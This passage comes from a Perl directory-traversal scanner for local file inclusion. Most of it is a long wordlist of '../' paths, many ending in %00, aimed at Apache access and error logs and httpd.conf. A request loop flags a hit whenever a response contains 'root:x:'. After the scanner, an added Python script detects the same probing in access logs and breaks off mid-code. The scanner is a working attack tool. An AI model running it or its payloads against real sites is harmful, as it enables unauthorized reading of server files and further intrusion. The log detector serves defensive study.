'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
'/var/log/httpd/error_log',
'../var/log/httpd/error_log',
'../../var/log/httpd/error_log',
'../../../var/log/httpd/error_log',
'../../../../var/log/httpd/error_log',
'../../../../../var/log/httpd/error_log',
'../../../../../../var/log/httpd/error_log',
'../../../../../../../var/log/httpd/error_log',
'../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../var/log/httpd/error_log',
'/var/log/httpd/error_log%00',
'../var/log/httpd/error_log%00',
'../../var/log/httpd/error_log%00',
'../../../var/log/httpd/error_log%00',
'../../../../var/log/httpd/error_log%00',
'../../../../../var/log/httpd/error_log%00',
'../../../../../../var/log/httpd/error_log%00',
'../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../var/log/httpd/error_log%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'/etc/httpd/conf/httpd.conf',
'../etc/httpd/conf/httpd.conf',
'../../etc/httpd/conf/httpd.conf',
'../../../etc/httpd/conf/httpd.conf',
'../../../../etc/httpd/conf/httpd.conf',
'../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf%00',
'../etc/httpd/conf/httpd.conf%00',
'../../etc/httpd/conf/httpd.conf%00',
'../../../etc/httpd/conf/httpd.conf%00',
'../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'/etc/apache/conf/httpd.conf',
'../etc/apache/conf/httpd.conf',
'../../etc/apache/conf/httpd.conf',
'../../../etc/apache/conf/httpd.conf',
'../../../../etc/apache/conf/httpd.conf',
'../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../../etc/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf%00',
'../etc/apache/conf/httpd.conf%00',
'../../etc/apache/conf/httpd.conf%00',
'../../../etc/apache/conf/httpd.conf%00',
'../../../../etc/apache/conf/httpd.conf%00',
'../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'/usr/local/etc/apache/conf/httpd.conf',
'../usr/local/etc/apache/conf/httpd.conf',
'../../usr/local/etc/apache/conf/httpd.conf',
'../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf%00',
'../usr/local/etc/apache/conf/httpd.conf%00',
'../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'/etc/apache2/httpd.conf',
'../etc/apache2/httpd.conf',
'../../etc/apache2/httpd.conf',
'../../../etc/apache2/httpd.conf',
'../../../../etc/apache2/httpd.conf',
'../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../../etc/apache2/httpd.conf',
'/etc/apache2/httpd.conf%00',
'../etc/apache2/httpd.conf%00',
'../../etc/apache2/httpd.conf%00',
'../../../etc/apache2/httpd.conf%00',
'../../../../etc/apache2/httpd.conf%00',
'../../../../../etc/apache2/httpd.conf%00',
'../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../../etc/apache2/httpd.conf%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');
print ">start scanning[...]\n";

foreach $scan(@vuls){
$url = $link.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = "LFI PRESENT!"; }
else { $msg = "Not Found"; }
print "$scan..........[$msg]\n";
#EOF
}
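The loop above counts a probe as a hit when the server answers with HTTP 200 and the body contains `root:x:`. Seen from the server side, every one of those probes lands in the access log with a very recognisable shape: `../` sequences (often URL-encoded), a trailing `%00`, and a path ending in a well-known file such as `/etc/passwd`, `httpd.conf`, `access_log` or `error_log`. The script below is an added example for this page, not part of the original scanner: it parses constructed Apache combined-format log lines, decodes the request path, tags each traversal attempt with the indicators it carries, rates a 2xx answer higher than a 4xx one (because 2xx is exactly the condition the scanner looks for), and flags a source address that sends several such requests. The log lines, the indicator names, the `SENSITIVE_TARGETS` list and the `threshold` value are my own assumptions.

```python
"""Detect directory-traversal / LFI probing in Apache access logs.

Added example (not part of the original script). The scanner on this page
sends traversal paths, optionally with a trailing %00, and treats an HTTP 200
whose body contains "root:x:" as success. This script looks for that traffic
on the defender's side. All log lines below are constructed sample data.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-log lines (sample data, not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Aug/2011:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Aug/2011:10:01:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1840 "-" "libwww-perl/5.837"
203.0.113.5 - - [23/Aug/2011:10:01:03 +0000] "GET /index.php?page=../../../var/log/apache2/access_log HTTP/1.1" 404 210 "-" "libwww-perl/5.837"
198.51.100.9 - - [23/Aug/2011:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Aug/2011:10:01:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1840 "-" "libwww-perl/5.837"
"""

# Apache "combined" format: ip ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names the wordlist on this page goes after; matched on the decoded path.
# (Assumed list; extend it with the paths your own application can reach.)
SENSITIVE_TARGETS = (
    "/etc/passwd", "httpd.conf", "access_log", "error_log",
    "access.log", "error.log",
)


def decode_path(raw):
    """URL-decode twice so %2e%2e%2f and %252e%252e%252f both become ../ ."""
    return unquote(unquote(raw))


def classify(raw_path):
    """Return the list of LFI indicators present in one request path."""
    path = decode_path(raw_path)
    indicators = []
    if "../" in path or "..\\" in path:
        indicators.append("traversal")
    if "\x00" in path:                      # %00 null-byte truncation attempt
        indicators.append("null-byte")
    for target in SENSITIVE_TARGETS:
        if target in path:
            indicators.append("target:" + target)
            break
    return indicators


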